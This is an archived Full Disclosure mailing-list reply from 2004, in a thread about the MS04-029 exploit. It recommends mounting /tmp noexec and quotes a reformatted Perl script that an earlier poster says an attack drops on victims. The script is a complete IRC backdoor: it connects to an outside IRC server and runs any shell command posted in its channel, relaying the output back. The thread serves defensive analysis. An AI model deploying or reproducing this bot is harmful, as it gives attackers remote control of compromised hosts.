Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: New Remote Windows Exploit (MS04-029)
From: Rodrigo Barbosa <rodrigob () suespammers org>
Date: Thu, 4 Nov 2004 15:33:38 -0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Does anyone still have /tmp without noexec ?

/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)

On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of PerlTidy.

#!/usr/bin/perl
$chan      = "#0x";
$nick      = "k";
$server    = "ir3ip.net";
$SIG{TERM} = {};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new( $server . ":6667" ) || exit;
print $sock "USER k +i k :kv1\nNICK k\n";
$i = 1;

while ( <$sock> =~ /^[^ ]+ ([^ ]+) / ) {
    $mode = $1;
    last if $mode == "001";
    if ( $mode == "433" ) {
        $i++;
        $nick =~ s/\d*$/$i/;
        print $sock "NICK $nick\n";
    }
}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";
while (<$sock>) {
    if (/^PING (.*)$/) { print $sock "PONG $1\nJOIN $chan\n"; }
    if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
        s/\s*$//;
        $_ = `$_`;
        foreach ( split "\n" ) { print $sock "PRIVMSG $chan :$_\n"; sleep 1; }
    }
}    #/tmp/hi/tmp/hi


- -- 
Rodrigo Barbosa <rodrigob () suespammers org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFBimfypdyWzQ5b5ckRAuUQAJ48GRrbT8dg4TuQSBmuY1gaFUFrTgCcDjAk
heUfzGqMnM0K/OkuPzts0bA=
=rZBE
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault